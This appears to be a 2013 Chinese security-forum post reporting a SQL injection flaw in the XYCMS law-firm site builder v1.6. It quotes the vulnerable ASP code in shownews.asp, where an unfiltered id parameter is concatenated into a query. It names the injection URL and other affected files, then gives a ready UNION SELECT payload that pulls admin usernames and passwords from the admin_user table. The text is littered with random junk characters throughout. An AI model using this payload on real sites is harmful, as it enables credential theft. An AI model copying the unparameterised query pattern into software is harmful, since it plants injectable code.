前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似# h* C$ D$ O1 w+ Q( Y
1 U: Q% j/ h1 `0 A% z$ z- b淫荡分割线/ d8 ?1 X' p' F3 A, W9 E
--------------------------------------------------------1 U9 N- i6 D' _: R% a+ Y$ s
8 x8 k4 C: g1 L! O) S审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
. q( k7 O7 j) `" c( h8 h/ R- n5 a源码地址:http://down.chinaz.com/soft/29233.htm% j; I4 P S% a4 d+ h
- b: h4 a# R$ w; w" e \漏洞文件:shownews.asp M3 P- X, @! t2 I
漏洞代码:7-13行. U2 A: l/ o) i. e# q, B l
5 @( Z) ? _: \& g$ [/ p Y 1 X- s9 a' h+ D; g2 f4 D
<% % M& t7 I9 J. P) O8 k/ ^' b
id=request.QueryString("id")
& [; l) d% R7 ^" m% }! A+ |* k: G , J1 \/ J7 R" ?$ \
set snews=server.createobject("adodb.recordset") " ^8 B! x( F, r' S9 \
exec="select * from [news] where id="&id9 Z* n# R+ f1 E; M) y% ?2 _7 A( F- K
snews.open exec,conn,1,1
4 t- \2 q' ~' M2 s9 ]5 ^%>
* n" Q: l/ }" {2 g" N+ p' e ) I. d% p J6 D& c W* }$ N3 r( [
, _+ `7 V8 E v ?* i- k1 a% J
什么过滤都没有 直造成注入
6 W+ U/ k8 u) g# d3 a
5 B. d( P8 Q R. v0 x注入点:http://127.0.0.1:99/shownews.asp?id=xx. r# J, r: b- r" ^1 E3 [
, J5 b+ o. Y" V% @6 `
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
! @) u7 T# H6 h: e* j
2 @8 `, Y! k9 z1 L- ?
6 i4 u& `, N. N; ^8 o3 ^exp: union select 1,admin,password,4,5,7 from admin_user8 t+ j0 O5 M& e9 b7 |. V* b
& o& f @& M" w/ o |
发表于 2013-4-4 17:28:12
收藏
支持
反对